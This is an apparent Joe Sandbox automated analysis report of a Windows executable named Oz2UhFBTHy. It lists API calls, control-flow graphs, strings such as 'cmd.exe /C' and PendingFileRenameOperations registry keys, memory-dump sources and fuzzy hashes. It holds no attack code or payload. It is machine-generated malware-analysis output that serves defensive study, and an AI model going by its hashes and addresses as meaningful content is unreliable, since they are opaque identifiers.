                                                                                                      • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                      • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                      • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                      • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                      • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                      • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                      • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                      APIs
                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$Prop
                                                                                                      • String ID: 3A$yA
                                                                                                      • API String ID: 3887896539-3278460822
                                                                                                      • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                      • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                      • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                      • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                                      APIs
                                                                                                      • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                        • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                        • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                      • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                      • String ID: c:\directory$shell32.dll$%H
                                                                                                      • API String ID: 3376378930-166502273
                                                                                                      • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                      • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                                      • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                      • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                      • GetFocus.USER32 ref: 0042F597
                                                                                                      • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                      • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                      • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                      • String ID: TWindowDisabler-Window
                                                                                                      • API String ID: 3167913817-1824977358
                                                                                                      • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                      • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                                      • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                      • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                      • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                      • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                                      • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                      • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                                      APIs
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                      • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                      • API String ID: 4130936913-2943970505
                                                                                                      • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                      • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                                      • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                      • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                                        • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                        • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                        • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                        • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                      • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                      • API String ID: 854858120-615399546
                                                                                                      • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                      • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                                      • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                      • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                                      APIs
                                                                                                      • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                      • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                      • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$FileIconLoadLowerModuleName
                                                                                                      • String ID: 2$MAINICON
                                                                                                      • API String ID: 3935243913-3181700818
                                                                                                      • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                      • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                                      • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                      • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                                        • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                                        • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                        • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                        • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                        • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                        • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                        • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                        • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                        • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                        • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                        • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                        • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                        • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                      • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                      • API String ID: 316262546-2767913252
                                                                                                      • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                      • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                      • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                      • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                      APIs
                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$Prop
                                                                                                      • String ID:
                                                                                                      • API String ID: 3887896539-0
                                                                                                      • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                      • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                      • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                      • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                      Strings
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                      • PendingFileRenameOperations, xrefs: 00455754
                                                                                                      • WININIT.INI, xrefs: 004557E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                      • API String ID: 47109696-2199428270
                                                                                                      • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                      • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                      • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                      • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
